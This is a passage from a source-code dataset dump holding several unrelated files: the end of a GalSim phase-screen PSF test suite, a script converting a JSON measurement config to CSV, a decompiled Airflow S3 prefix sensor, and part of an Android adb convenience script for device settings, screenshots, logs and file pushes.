err_msg=\"PhaseScreenPSF did not adopt forced value for maxk\")\n do_pickle(psf)\n do_pickle(psf2)\n\n # Try out non-geometric-shooting\n psf3 = atm.makePSF(lam=500.0, aper=aper, geometric_shooting=False)\n img = galsim.Image(32, 32, scale=0.2)\n do_shoot(psf3, img, \"PhaseScreenPSF\")\n # Also make sure a few other methods at least run\n psf3.centroid\n psf3.max_sb\n\n\n@timer\ndef test_ne():\n \"\"\"Test Apertures, PhaseScreens, PhaseScreenLists, and PhaseScreenPSFs for not-equals.\"\"\"\n pupil_plane_im = galsim.fits.read(os.path.join(imgdir, pp_file))\n\n # Test galsim.Aperture __ne__\n objs = [galsim.Aperture(diam=1.0),\n galsim.Aperture(diam=1.1),\n galsim.Aperture(diam=1.0, oversampling=1.5),\n galsim.Aperture(diam=1.0, pad_factor=1.5),\n galsim.Aperture(diam=1.0, circular_pupil=False),\n galsim.Aperture(diam=1.0, obscuration=0.3),\n galsim.Aperture(diam=1.0, nstruts=3),\n galsim.Aperture(diam=1.0, nstruts=3, strut_thick=0.2),\n galsim.Aperture(diam=1.0, nstruts=3, strut_angle=15*galsim.degrees),\n galsim.Aperture(diam=1.0, pupil_plane_im=pupil_plane_im),\n galsim.Aperture(diam=1.0, pupil_plane_im=pupil_plane_im,\n pupil_angle=10.0*galsim.degrees)]\n all_obj_diff(objs)\n\n # Test AtmosphericScreen __ne__\n rng = galsim.BaseDeviate(1)\n objs = [galsim.AtmosphericScreen(10.0, rng=rng),\n galsim.AtmosphericScreen(10.0, rng=rng, vx=1.0),\n galsim.AtmosphericScreen(10.0, rng=rng, vy=1.0),\n galsim.AtmosphericScreen(10.0, rng=rng, alpha=0.999, time_step=0.01),\n galsim.AtmosphericScreen(10.0, rng=rng, altitude=1.0),\n galsim.AtmosphericScreen(10.0, rng=rng, alpha=0.999, time_step=0.02),\n galsim.AtmosphericScreen(10.0, rng=rng, alpha=0.998, time_step=0.02),\n galsim.AtmosphericScreen(10.0, rng=rng, r0_500=0.1),\n galsim.AtmosphericScreen(10.0, rng=rng, L0=10.0),\n galsim.AtmosphericScreen(10.0, rng=rng, vx=10.0),\n ]\n all_obj_diff(objs)\n\n # Test OpticalScreen __ne__\n objs = [galsim.OpticalScreen(diam=1.0, ),\n galsim.OpticalScreen(diam=1.0, tip=1.0),\n galsim.OpticalScreen(diam=1.0, tilt=1.0),\n galsim.OpticalScreen(diam=1.0, defocus=1.0),\n galsim.OpticalScreen(diam=1.0, astig1=1.0),\n galsim.OpticalScreen(diam=1.0, astig2=1.0),\n galsim.OpticalScreen(diam=1.0, coma1=1.0),\n galsim.OpticalScreen(diam=1.0, coma2=1.0),\n galsim.OpticalScreen(diam=1.0, trefoil1=1.0),\n galsim.OpticalScreen(diam=1.0, trefoil2=1.0),\n galsim.OpticalScreen(diam=1.0, spher=1.0),\n galsim.OpticalScreen(diam=1.0, spher=1.0, lam_0=100.0),\n galsim.OpticalScreen(diam=1.0, aberrations=[0,0,1.1]), # tip=1.1\n ]\n all_obj_diff(objs)\n\n # Test PhaseScreenList __ne__\n atm = galsim.Atmosphere(10.0, vx=1.0)\n objs = [galsim.PhaseScreenList(atm),\n galsim.PhaseScreenList(objs), # Reuse list of OpticalScreens above\n galsim.PhaseScreenList(objs[0:2])]\n all_obj_diff(objs)\n\n # Test PhaseScreenPSF __ne__\n psl = galsim.PhaseScreenList(atm)\n objs = [galsim.PhaseScreenPSF(psl, 500.0, exptime=0.03, diam=1.0)]\n objs += [galsim.PhaseScreenPSF(psl, 700.0, exptime=0.03, diam=1.0)]\n objs += [galsim.PhaseScreenPSF(psl, 700.0, exptime=0.03, diam=1.1)]\n objs += [galsim.PhaseScreenPSF(psl, 700.0, exptime=0.03, diam=1.0, flux=1.1)]\n objs += [galsim.PhaseScreenPSF(psl, 700.0, exptime=0.03, diam=1.0, interpolant='linear')]\n stepk = objs[0].stepk\n maxk = objs[0].maxk\n objs += [galsim.PhaseScreenPSF(psl, 700.0, exptime=0.03, diam=1.0, _force_stepk=stepk/1.5)]\n objs += [galsim.PhaseScreenPSF(psl, 700.0, exptime=0.03, diam=1.0, _force_maxk=maxk*2.0)]\n all_obj_diff(objs)\n\n\n@timer\ndef test_phase_gradient_shoot():\n # Make 
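`test_ne` above leans on the `all_obj_diff` helper from galsim_test_helpers. Its core contract, sketched (the real helper is more thorough; this is just the idea): objects built with different parameters must compare unequal pairwise and hash apart.

```python
# Sketch of the core contract behind all_obj_diff.
from itertools import combinations


def all_obj_diff_sketch(objs):
    for a, b in combinations(objs, 2):
        assert a != b, "{!r} == {!r}".format(a, b)
        assert hash(a) != hash(b), "hash collision: {!r} / {!r}".format(a, b)
```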
the atmosphere\n seed = 12345\n r0_500 = 0.2 # m\n nlayers = 6\n screen_size = 102.4 # m\n screen_scale = 0.1 # m\n max_speed = 20 # m/s\n\n rng = galsim.BaseDeviate(seed)\n u = galsim.UniformDeviate(rng)\n\n # Use atmospheric weights from 1998 Gemini site selection process as something reasonably\n # realistic. (Ellerbroek 2002, JOSA Vol 19 No 9).\n Ellerbroek_alts = [0.0, 2.58, 5.16, 7.73, 12.89, 15.46] # km\n Ellerbroek_weights = [0.652, 0.172, 0.055, 0.025, 0.074, 0.022]\n Ellerbroek_interp = galsim.LookupTable(\n Ellerbroek_alts,\n Ellerbroek_weights,\n interpolant='linear')\n alts = np.max(Ellerbroek_alts)*np.arange(nlayers)/(nlayers-1)\n weights = Ellerbroek_interp(alts)\n weights /= sum(weights)\n\n spd = [] # Wind speed in m/s\n dirn = [] # Wind direction in radians\n r0_500s = [] # Fried parameter in m at a wavelength of 500 nm.\n for i in range(nlayers):\n spd.append(u()*max_speed)\n dirn.append(u()*360*galsim.degrees)\n r0_500s.append(r0_500*weights[i]**(-3./5))\n atm = galsim.Atmosphere(r0_500=r0_500, speed=spd, direction=dirn, altitude=alts, rng=rng,\n screen_size=screen_size, screen_scale=screen_scale)\n\n lam = 500.0\n diam = 4.0\n pad_factor = 1.0\n oversampling = 1.0\n\n aper = galsim.Aperture(diam=diam, lam=lam,\n screen_list=atm, pad_factor=pad_factor,\n oversampling=oversampling)\n\n xs = np.empty((10,), dtype=float)\n ys = np.empty((10,), dtype=float)\n u.generate(xs)\n u.generate(ys)\n thetas = [(x*galsim.degrees, y*galsim.degrees) for x, y in zip(xs, ys)]\n\n if __name__ == '__main__':\n exptime = 15.0\n centroid_tolerance = 0.05\n second_moment_tolerance = 0.5\n else:\n exptime = 0.2\n centroid_tolerance = 0.2\n second_moment_tolerance = 1.5\n\n psfs = [atm.makePSF(lam, diam=diam, theta=th, exptime=exptime, aper=aper) for th in thetas]\n shoot_moments = []\n fft_moments = []\n\n # At the moment, Ixx and Iyy (but not Ixy) are systematically smaller in phase gradient shooting\n # mode than in FFT mode. 
For now, I'm willing to accept this, but we should revisit it once we\n # get the \"second kick\" approximation implemented.\n offset = 0.5\n\n for psf in psfs:\n im_shoot = psf.drawImage(nx=48, ny=48, scale=0.05, method='phot', n_photons=100000, rng=rng)\n im_fft = psf.drawImage(nx=48, ny=48, scale=0.05)\n\n shoot_moment = galsim.utilities.unweighted_moments(im_shoot)\n fft_moment = galsim.utilities.unweighted_moments(im_fft)\n\n for key in ['Mx', 'My']:\n np.testing.assert_allclose(\n shoot_moment[key], fft_moment[key], rtol=0, atol=centroid_tolerance,\n err_msg='Phase gradient centroid {0} not close to fft centroid'.format(key))\n\n for key in ['Mxx', 'Myy']:\n np.testing.assert_allclose(\n shoot_moment[key]+offset, fft_moment[key], rtol=0, atol=second_moment_tolerance,\n err_msg='Phase gradient second moment {} not close to fft moment'.format(key))\n\n np.testing.assert_allclose(\n shoot_moment['Mxy'], fft_moment['Mxy'], rtol=0, atol=second_moment_tolerance,\n err_msg='Phase gradient second moment Mxy not close to fft moment')\n\n shoot_moments.append(shoot_moment)\n fft_moments.append(fft_moment)\n\n # Verify that shoot with rng=None runs\n psf.shoot(100, rng=None)\n\n # Constraints on the ensemble should be tighter than for individual PSFs.\n mean_shoot_moment = {}\n mean_fft_moment = {}\n for k in shoot_moments[0]:\n mean_shoot_moment[k] = np.mean([sm[k] for sm in shoot_moments])\n mean_fft_moment[k] = np.mean([fm[k] for fm in fft_moments])\n\n for key in ['Mx', 'My']:\n np.testing.assert_allclose(\n mean_shoot_moment[key], mean_fft_moment[key], rtol=0, atol=centroid_tolerance,\n err_msg='Mean phase gradient centroid {0} not close to mean fft centroid'\n .format(key))\n\n for key in ['Mxx', 'Myy']:\n np.testing.assert_allclose(\n mean_shoot_moment[key]+offset, mean_fft_moment[key], rtol=0,\n atol=second_moment_tolerance,\n err_msg='Mean phase gradient second moment {} not close to mean fft moment'\n .format(key))\n\n np.testing.assert_allclose(\n mean_shoot_moment['Mxy'], mean_fft_moment['Mxy'], rtol=0, atol=second_moment_tolerance,\n err_msg='Mean phase gradient second moment Mxy not close to mean fft moment')\n\n\n@timer\ndef test_input():\n \"\"\"Check that exceptions are raised for invalid input\"\"\"\n\n # Specifying only one of alpha and time_step is an error.\n assert_raises(ValueError, galsim.AtmosphericScreen, screen_size=10.0, time_step=0.01)\n assert_raises(ValueError, galsim.AtmosphericScreen, screen_size=10.0, alpha=0.997)\n # But specifying both is alright.\n galsim.AtmosphericScreen(screen_size=10.0, alpha=0.997, time_step=0.01)\n\n # Try some variations for Atmosphere\n assert_raises(ValueError, galsim.Atmosphere,\n screen_size=10.0, altitude=[0., 1.],\n r0_500=[0.2, 0.3, 0.2])\n assert_raises(ValueError, galsim.Atmosphere,\n screen_size=10.0, r0_500=[0.4, 0.4, 0.4],\n r0_weights=[0.1, 0.3, 0.6])\n\n\n@timer\ndef test_r0_weights():\n \"\"\"Check that r0_weights functions as expected.\"\"\"\n r0_500 = 0.2\n\n # Check that reassembled net r0_500 matches input\n atm = galsim.Atmosphere(screen_size=10.0, altitude=[0,1,2,3], r0_500=r0_500)\n r0s = [screen.r0_500 for screen in atm]\n np.testing.assert_almost_equal(np.sum([r0**(-5./3) for r0 in r0s])**(-3./5), r0_500)\n\n # Check that old manual calculation matches automatic calculation inside Atmosphere()\n weights = [1, 2, 3, 4]\n normalized_weights = np.array(weights, dtype=float)/np.sum(weights)\n r0s_ref = [r0_500 * w**(-3./5) for w in normalized_weights]\n atm = galsim.Atmosphere(screen_size=10.0, altitude=[0,1,2,3], 
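The weight handling verified in `test_r0_weights` follows from turbulence strengths (the C_n² integrals) adding linearly, which makes Fried parameters compose in the -5/3 power:

```latex
% Composition law checked in test_r0_weights: a layer with normalized
% weight w_i of the total integrated turbulence has
r_{0,i} = r_{0,\mathrm{net}}\; w_i^{-3/5},
\qquad
r_{0,\mathrm{net}} = \Bigl(\sum_i r_{0,i}^{-5/3}\Bigr)^{-3/5}
```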
r0_500=r0_500, r0_weights=weights)\n r0s_test = [screen.r0_500 for screen in atm]\n np.testing.assert_almost_equal(r0s_test, r0s_ref)\n np.testing.assert_almost_equal(np.sum([r0**(-5./3) for r0 in r0s_test])**(-3./5), r0_500)\n\n\n@timer\ndef test_speedup():\n \"\"\"Make sure that photon-shooting a PhaseScreenPSF with geometric approximation yields\n significant speedup.\n \"\"\"\n import time\n atm = galsim.Atmosphere(screen_size=10.0, altitude=[0,1,2,3], r0_500=0.2)\n # Should be ~seconds if _prepareDraw() gets executed, ~0.01s otherwise.\n psf = atm.makePSF(lam=500.0, diam=1.0, exptime=15.0, time_step=0.025)\n t0 = time.time()\n psf.drawImage(method='phot', n_photons=1e3)\n t1 = time.time()\n assert (t1-t0) < 0.1, \"Photon-shooting took too long ({0} s).\".format(t1-t0)\n\n\nif __name__ == \"__main__\":\n test_aperture()\n test_atm_screen_size()\n test_structure_function()\n test_phase_screen_list()\n test_frozen_flow()\n test_phase_psf_reset()\n test_phase_psf_batch()\n test_opt_indiv_aberrations()\n test_scale_unit()\n test_stepk_maxk()\n test_ne()\n test_phase_gradient_shoot()\n test_input()\n test_r0_weights()\n test_speedup()\n","sub_path":"tests/test_phase_psf.py","file_name":"test_phase_psf.py","file_ext":"py","file_size_in_byte":28461,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"313882796","text":"import json\nimport pandas as pd\n\nimport pprint\n\ndef config_to_df(config):\n\n platforms = []\n meas_types = []\n scales = []\n measurement_names = []\n measurement_functions = []\n meas_args = []\n metric_names = []\n metric_funcs = []\n metric_args = []\n temporals = []\n\n for platform in config.keys():\n for meas_type in config[platform]:\n for scale in config[platform][meas_type]:\n for meas_name in config[platform][meas_type][scale]:\n \n meas = config[platform][meas_type][scale][meas_name] \n\n if 'measurement' in config[platform][meas_type][scale][meas_name].keys():\n\n for metric_name in meas['metrics'].keys():\n\n measurement_functions.append(meas['measurement'])\n metric_names.append(metric_name)\n metric_funcs.append(meas['metrics'][metric_name]['metric'])\n platforms.append(platform)\n meas_types.append(meas_type)\n scales.append(scale)\n measurement_names.append(meas_name)\n\n if 'metric_args' in meas['metrics'][metric_name]:\n metric_args.append(meas['metrics'][metric_name]['metric_args'])\n else:\n metric_args.append({})\n\n if 'temporal_vs_batch' in meas.keys():\n temporals.append(meas['temporal_vs_batch'])\n else:\n temporals.append('Batch')\n\n if 'measurement_args' in meas.keys():\n meas_args.append(meas['measurement_args'])\n else:\n meas_args.append({}) \n else:\n print('No measurement:',meas_name)\n\n df = pd.DataFrame({'Platform':platforms,\n 'Measurement Type':meas_types,\n 'Group Scale': scales,\n 'Measurement': measurement_names,\n 'Measurement Function': measurement_functions,\n 'Measurement Args': meas_args,\n 'Metrics': metric_names,\n 'Metric Functions':metric_funcs,\n 'Metric Args':metric_args,\n 'Temporal':temporals})\n\n\n return(df)\n\n\ndef main():\n fn = 'cp3_s1_configuration.json'\n\n with open(fn, 'r') as f:\n config = json.load(f)\n\n df = config_to_df(config)\n\n df.to_csv('cp3_s1_configuration.csv', index=False)\n\n fn = 'cp3_s2_configuration.json'\n\n\n with open(fn,'r') as f:\n config = json.load(f)\n\n df = config_to_df(config)\n\n df.to_csv('cp3_s2_configuration.csv',index=False)\n\n\nif __name__ == \"__main__\":\n 
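A tiny worked input for `config_to_df` above — the platform, measurement, and metric names are hypothetical — showing that one measurement carrying two metrics flattens to two DataFrame rows:

```python
# Tiny illustrative input for config_to_df (names hypothetical); assumes
# config_to_df from the module above is in scope.
config = {
    "twitter": {
        "social": {
            "population": {
                "share_count": {
                    "measurement": "count_shares",
                    "metrics": {
                        "rmse": {"metric": "rmse_func"},
                        "r2": {"metric": "r2_func"},
                    },
                }
            }
        }
    }
}

df = config_to_df(config)
assert len(df) == 2
assert set(df["Metrics"]) == {"rmse", "r2"}
assert set(df["Temporal"]) == {"Batch"}  # default when temporal_vs_batch absent
```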
main()\n","sub_path":"examples/data/config_to_csv.py","file_name":"config_to_csv.py","file_ext":"py","file_size_in_byte":3008,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"596712653","text":"# uncompyle6 version 3.6.7\n# Python bytecode 3.6 (3379)\n# Decompiled from: Python 3.8.2 (tags/v3.8.2:7b3ab59, Feb 25 2020, 23:03:10) [MSC v.1916 64 bit (AMD64)]\n# Embedded file name: build/bdist.macosx-10.7-x86_64/egg/airflow/sensors/s3_prefix_sensor.py\n# Compiled at: 2019-09-11 03:47:34\n# Size of source mod 2**32: 3417 bytes\nfrom airflow.sensors.base_sensor_operator import BaseSensorOperator\nfrom airflow.utils.decorators import apply_defaults\n\nclass S3PrefixSensor(BaseSensorOperator):\n \"\"\"S3PrefixSensor\"\"\"\n template_fields = ('prefix', 'bucket_name')\n\n @apply_defaults\n def __init__(self, bucket_name, prefix, delimiter='/', aws_conn_id='aws_default', verify=None, *args, **kwargs):\n (super(S3PrefixSensor, self).__init__)(*args, **kwargs)\n self.bucket_name = bucket_name\n self.prefix = prefix\n self.delimiter = delimiter\n self.full_url = 's3://' + bucket_name + '/' + prefix\n self.aws_conn_id = aws_conn_id\n self.verify = verify\n\n def poke(self, context):\n self.log.info('Poking for prefix : %s in bucket s3://%s', self.prefix, self.bucket_name)\n from airflow.hooks.S3_hook import S3Hook\n hook = S3Hook(aws_conn_id=(self.aws_conn_id), verify=(self.verify))\n return hook.check_for_prefix(prefix=(self.prefix),\n delimiter=(self.delimiter),\n bucket_name=(self.bucket_name))","sub_path":"pycfiles/apache_ariatosca-0.2.0-py2-none-any/s3_prefix_sensor.cpython-36.py","file_name":"s3_prefix_sensor.cpython-36.py","file_ext":"py","file_size_in_byte":1388,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"542551255","text":"import os\nimport sys\nimport re\nimport time\nimport Helps\nfrom pydoc import help\nfrom sys import exit\n\nselected = None\n# {%count : (%serial_id, %platform)}\n\ndef execute(cmd, show):\n\tif cmd.startswith('adb') and selected:\n\t\tfor key in selected.keys():\n\t\t\tif key == 2:\n\t\t\t\tdevice = selected[key]\n\t\t\t\tcmd = cmd[0:3] + (' -s %s ' % device[0]) + cmd[4:]\n\t\t\tbreak\n\tif show:\n\t\tprint('cmd: %s' % cmd)\n\tf = os.popen(cmd, 'r')\n\trst = f.read()\n\tf.close()\n\treturn rst;\n\ndef numberic(value):\n\trst = re.match('[0-9]{1,}', value, flags=0)\n\treturn False if not rst else (True if rst.group() == value else False)\n\ndef root():\n\texecute('adb root', False)\n\ndef remount():\n\texecute('adb remount', False)\n\ndef dev():\n\tdatabase(['global', 'development_settings_enabled', '1'])\n\tstart(['-n', 'com.android.settings/.Settings'])\n\tstart(['-a', 'android.settings.APPLICATION_DEVELOPMENT_SETTINGS'])\n\ndef log():\n\tplat = 'mtk'\n\tif selected and len(selected) == 1:\n\t\tfor value in selected.values():\n\t\t\tplat = value[1]\n\t\t\tbreak\n\tif plat == 'mtk':\n\t\tstart(['-n', 'com.mediatek.mtklogger/.MainActivity'])\n\telif plat == 'sprd':\n\t\tstart(['-n', 'com.sprd.logmanager/.logui.LogMainActivity'])\n\telif plat == 'qcom':\n\t\tpass\n\ndef engmode():\n\tplat = 'mtk'\n\tif selected and len(selected) == 1:\n\t\tfor value in selected.values():\n\t\t\tplat = value[1]\n\t\t\tbreak\n\tdatabase(['global', 'development_settings_enabled', '1'])\n\tif plat == 'mtk':\n\t\tstart(['-n', 'com.mediatek.engineermode/.EngineerMode'])\n\telif plat == 'sprd':\n\t\tstart(['-n', 'com.sprd.engineermode/.EngineerModeActivity'])\n\telif plat == 
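The `execute()` wrapper at the top of the adb helper script above rewrites commands to target the selected device by splicing `-s <serial>` after the `adb` token. The string surgery in isolation (the serial number is a made-up example):

```python
# The device-targeting rewrite performed by execute(), isolated.
def with_serial(cmd, serial):
    if cmd.startswith('adb') and serial:
        return cmd[0:3] + (' -s %s ' % serial) + cmd[4:]
    return cmd


assert with_serial('adb shell ls', 'emulator-5554') == \
    'adb -s emulator-5554 shell ls'
assert with_serial('fastboot devices', 'emulator-5554') == 'fastboot devices'
```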
'qcom':\n\t\tpass\n\ndef platform():\n\tcpu_info = execute('adb shell \\\"cat /proc/cpuinfo\\\"', False)\n\thardware = None\n\tfor line in cpu_info.split('\\n'):\n\t\tmatchObj = re.match('(?i)Hardware\\t*: (.*)', line)\n\t\tif matchObj:\n\t\t\thardware = matchObj.group(1)\n\t\t\tbreak\n\n\tif not hardware:\n\t\treturn 'unknown'\n\tif 'MT' in hardware:\n\t\treturn 'mtk'\n\telif 'Unisoc' in hardware:\n\t\treturn 'sprd'\n\telif 'Qualcomm' in hardware:\n\t\treturn 'qcom'\n\n\t# mtk_flag = execute('adb shell \\\"getprop | grep mtk\\\"', False)\n\t# if len(mtk_flag):\n\t# \treturn 'mtk'\n\t# else :\n\t# \tsprd_flag = execute('adb shell \\\"getprop | grep sprd\\\"', False)\n\t# \tif len(sprd_flag):\n\t# \t\treturn 'sprd'\n\t# \telse :\n\t# \t\tqcom_flag = execute('adb shell \\\"getprop | grep qcom\\\"', False)\n\t# \t\tif len(qcom_flag):\n\t# \t\t\treturn 'qcom'\n\treturn 'unknown'\n\ndef pulllog(argv=sys.argv[2:]):\n\tplat = 'mtk'\n\tif selected and len(selected) == 1:\n\t\tfor value in selected.values():\n\t\t\tplat = value[1]\n\t\t\tbreak\n\tsource = None\n\tif plat == 'mtk':\n\t\tsource = '/sdcard/mtklog/'\n\telif plat == 'sprd':\n\t\tsource = '/sdcard/ylog/'\n\telif plat == 'qcom':\n\t\tpass\n\n\tdst = argv[0] if len(argv) else ''\n\n\tif source:\n\t\tprint(execute('adb pull %s %s' % (source, dst), True))\n\ndef database(argv=sys.argv[2:], prt=False):\n\tif len(argv) >= 1:\n\t\ttable = argv[0]\n\t\tif table in ('system', 'secure', 'global') and len(argv) >= 2:\n\t\t\tname = argv[1]\n\t\t\tvalue = argv[2] if len(argv) >= 3 else None\n\t\t\tif value:\n\t\t\t\texecute('adb shell settings put %s %s %s' % (table, name, value), True)\n\t\t\tresult = execute('adb shell settings get %s %s' % (table, name), True)\n\t\t\tif prt:\n\t\t\t\tprint(result)\n\t\t\treturn result\n\treturn '-h'\n\ndef prop(argv=sys.argv[2:], prt=False):\n\tif len(argv) >= 1:\n\t\troot()\n\t\tkey = argv[0]\n\t\tvalue = argv[1] if len(argv) >= 2 else None\n\t\tif value:\n\t\t\texecute('adb shell setprop %s %s' % (key, value), True)\n\t\tresult = execute('adb shell getprop %s' % key, True)\n\t\tif prt:\n\t\t\tprint(result)\n\t\treturn result\n\treturn '-h'\n\ndef topact(argv=sys.argv[2:]):\n\trst = execute('adb shell \\\"dumpsys activity top | grep ACTIVITY\\\"', True)\n\tarray = rst.split('\\n')\n\thelp_flag = False\n\tfor item in array:\n\t\titem = item.lstrip().rstrip()\n\t\tif not len(item):\n\t\t\tcontinue\n\t\tprint(item)\n\t\tif len(argv) >= 1:\n\t\t\tmatchObj = re.match('ACTIVITY (.*)/(.*) ([0-9a-fA-F].*) pid=(.*)', item)\n\t\t\tif not matchObj or len(matchObj.groups()) < 4:\n\t\t\t\tcontinue\n\t\t\tpkg = matchObj.group(1)\n\t\t\tif argv[0] == '-p':\n\t\t\t\tprint(execute('adb shell pm path %s' % (pkg), True))\n\t\t\telif argv[0] == '-f':\n\t\t\t\tprint(execute('adb shell pm list packages -f %s' % (pkg), True))\n\t\t\telse :\n\t\t\t\thelp_flag = True\n\tif help_flag:\n\t\treturn '-h'\n\ndef focus():\n\tprint(execute('adb shell \\\"dumpsys activity | grep mFocusedActivity\\\"', True))\n\ndef brt(argv=sys.argv[2:]):\n\tdb_arg = ['system', 'screen_brightness']\n\tif len(argv) >= 1:\n\t\tif numberic(argv[0]) and int(argv[0]) >= 0:\n\t\t\tdb_arg.append(int(argv[0]))\n\t\telse :\n\t\t\treturn '-h'\n\tdatabase(db_arg, True)\n\ndef density(argv=sys.argv[2:]):\n\tif len(argv) >= 1:\n\t\tif numberic(argv[0]) and int(argv[0]) >= 0:\n\t\t\tprint(execute('adb shell wm density %d' % (int(argv[0])), True))\n\t\telse :\n\t\t\treturn '-h'\n\tprint(execute('adb shell wm density', True))\n\ndef size():\n\tprint(execute('adb shell wm size', 
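`topact()` above scrapes `dumpsys activity top` output; its ACTIVITY-line regex in isolation, run against a fabricated sample line:

```python
# The ACTIVITY-line regex used by topact(); the sample line is fabricated.
import re

line = "ACTIVITY com.android.settings/.Settings 1a2b3c pid=1234"
m = re.match(r'ACTIVITY (.*)/(.*) ([0-9a-fA-F].*) pid=(.*)', line)
assert m.group(1) == "com.android.settings"   # package, fed to `pm path`
assert m.group(2) == ".Settings"              # activity
assert m.group(4) == "1234"                   # pid
```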
True))\n\ndef sf(argv=sys.argv[2:]):\n\tdb_arg = ['system', 'screen_off_timeout']\n\tif len(argv) >= 1:\n\t\tparm = argv[0]\n\t\tlast = parm[-1:]\n\t\tif last == 's' and numberic(parm[:-1]):\n\t\t\ttime = int(parm[:-1]) * 1000\n\t\telif last == 'm' and numberic(parm[:-1]):\n\t\t\ttime = int(parm[:-1]) * 60 * 1000\n\t\telif numberic(parm):\n\t\t\ttime = int(parm)\n\t\telse:\n\t\t\treturn '-h'\n\t\tdb_arg.append(time)\n\ttime = int(database(db_arg))\n\ttime_format = ('%dms' % time)\n\tif time >= 1000 and time < (60 * 1000) :\n\t\ttime_format = ('%ds' % (time / 1000))\n\telif time >= (60 * 1000) and time < (60 * 60 * 1000) :\n\t\ttime_format = ('%dm' % (time / 1000 / 60))\n\tprint(time_format)\n\ndef start(argv=sys.argv[2:]):\n\tif len(argv) >= 2 and argv[0] in ('-a', '-n'):\n\t\tprint(execute('adb shell am start %s %s' % (argv[0], argv[1]), True))\n\telse :\n\t\treturn '-h'\n\ndef send_key(argv=sys.argv[2:]):\n\tif len(argv) >= 1:\n\t\tprint(execute('adb shell input keyevent %s' % (argv[0]), True))\n\telse :\n\t\treturn '-h'\n\ndef volume(argv=sys.argv[2:]):\n\ttimes = int(argv[1:]) if numberic(argv[1:]) else 1\n\tfirst = argv[0]\n\tkey = 'KEYCODE_VOLUME_UP' if first == '+' else ('KEYCODE_VOLUME_DOWN' if first == '-' else '')\n\tif key:\n\t\tindex = 0\n\t\twhile index < times:\n\t\t\tindex += 1\n\t\t\tsend_key([key])\n\ndef cap(argv=sys.argv[2:]):\n\tpath = 'sdcard/caps/'\n\texecute('adb shell mkdir -p %s' % (path), False)\n\tname = time.strftime('%Y-%m-%d_%H-%M-%S', time.localtime()) + '.png'\n\tdst = path + name\n\tprint(execute('adb shell screencap -p %s' % (dst), True))\n\tif len(argv) >= 1 :\n\t\tif argv[0] != '-p':\n\t\t\treturn '-h'\n\t\tlocal = argv[1] if len(argv) >= 2 else ''\n\t\tif local.endswith(os.sep):\n\t\t\tlocal = local + name\n\t\tprint(execute('adb pull %s %s' % (dst, local), True))\n\ndef record(argv=sys.argv[2:]):\n\tpath = 'sdcard/caps/'\n\texecute('adb shell mkdir -p %s' % (path), False)\n\tname = time.strftime('%Y-%m-%d_%H-%M-%S', time.localtime()) + '.mp4'\n\tdst = path + name\n\ttry:\n\t\tcmd = ('adb shell screenrecord %s' % (dst))\n\t\tif len(argv) >= 1 :\n\t\t\tfor item in argv:\n\t\t\t\tif item == '-b':\n\t\t\t\t\tcmd = cmd + ' --bugreport'\n\t\t\t\t\tbreak\n\t\texecute(cmd, True)\n\texcept KeyboardInterrupt as e:\n\t\tprint('\\n')\n\tif len(argv) >= 1 :\n\t\tfor item in argv:\n\t\t\t\tif item == '-p':\n\t\t\t\t\tlocal = ''\n\t\t\t\t\tif len(argv) >= argv.index('-p') + 2 :\n\t\t\t\t\t\tlocal = argv[argv.index('-p') + 1]\n\t\t\t\t\tlocal = '' if local == '-b' else local\n\t\t\t\t\tif local.endswith(os.sep):\n\t\t\t\t\t\tlocal = local + name\n\t\t\t\t\ttime.sleep(1)\n\t\t\t\t\tprint(execute('adb pull %s %s' % (dst, local), True))\n\t\t\t\t\tbreak\n\ndef kill(argv=sys.argv[2:]):\n\tif len(argv):\n\t\tpkg = argv[0]\n\t\trst = execute('adb shell ps', True)\n\t\troot()\n\t\tfor line in rst.split('\\n'):\n\t\t\t# if line.endswith(pkg):\n\t\t\tif pkg in line:\n\t\t\t\t# Splits a string separated by an unquantified amount of space\n\t\t\t\tobj = re.findall('[\\S.]+', line)\n\t\t\t\tif obj and len(obj) > 1:\n\t\t\t\t\tpid = obj[1]\n\t\t\t\t\tif numberic(pid):\n\t\t\t\t\t\texecute('adb shell kill %s' % pid, True)\n\telse :\n\t\treturn '-h'\n\ndef clear(argv=sys.argv[2:]):\n\tif len(argv):\n\t\tpkg = argv[0]\n\t\trst = execute('adb shell pm clear %s' % pkg, True)\n\telse :\n\t\treturn '-h'\n\ndef pushs(argv=sys.argv[2:]):\n\tsource = argv[0] if len(argv) else None\n\ttarget = argv[1] if len(argv) > 1 else None\n\n\tif not source or not os.path.exists(source) or 
os.path.isfile(source):\n\t\treturn '-h'\n\n\t# find 'anchor' as we wanted\n\tavailable = ('system', 'vendor')\n\t# print(source.split(os.sep))\n\tanchor = None\n\tfor item in available:\n\t\tif item in source.split(os.sep):\n\t\t\tanchor = item\n\t\t\tbreak\n\tif not anchor and target:\n\t\tfor item in available:\n\t\t\tif item in target.split('/'):\n\t\t\t\tanchor = item\n\t\t\t\tbreak\n\t# print('anchor = %s' % anchor)\n\n\tif not anchor:\n\t\treturn '-h'\n\n\tif not target:\n\t\tif not anchor:\n\t\t\treturn '-h'\n\t\telse:\n\t\t\t# find target from source\n\t\t\ttarget = source[source.find(anchor):]\n\n\troot()\n\tremount()\n\n\ttarget = target.replace('\\\\', '/')\n\t# print('push %s -> %s' % (source, target))\n\n\tfiles = getFiles(source)\n\t# print(files)\n\tif files:\n\t\tpush_items = {}\n\t\tfor source_file in files:\n\t\t\ttarget_file = None\n\t\t\tif anchor in source_file:\n\t\t\t\ttarget_file = source_file[source_file.find(anchor):]\n\t\t\telse:\n\t\t\t\ttarget_file = (target if target.endswith('/') else target + '/') + source_file\n\t\t\ttarget_file = target_file.replace('\\\\', '/')\n\t\t\tpush_items[source_file] = target_file\n\t\t\t# print('push %s -> %s' % (source_file, target_file))\n\n\t\tif len(push_items):\n\t\t\tfor key, value in push_items.items():\n\t\t\t\tprint('%s -> %s' % (key, value))\n\t\t\tconfirm = compatible_input('push above items, do you confirm?(y/n)')\n\t\t\tif confirm == 'y':\n\t\t\t\tfor key, value in push_items.items():\n\t\t\t\t\tprint(execute('adb push %s %s' % (key, value), False))\n\ndef getFiles(path):\n\tif not os.path.exists(path):\n\t\treturn None\n\tif os.path.isfile(path):\n\t\treturn path\n\tif path.endswith(os.sep):\n\t\tpath = path[:-1]\n\tfiles = os.listdir(path)\n\taf = []\n\tfor file in files:\n\t\tisfile = os.path.isfile(path + os.sep + file)\n\t\tif 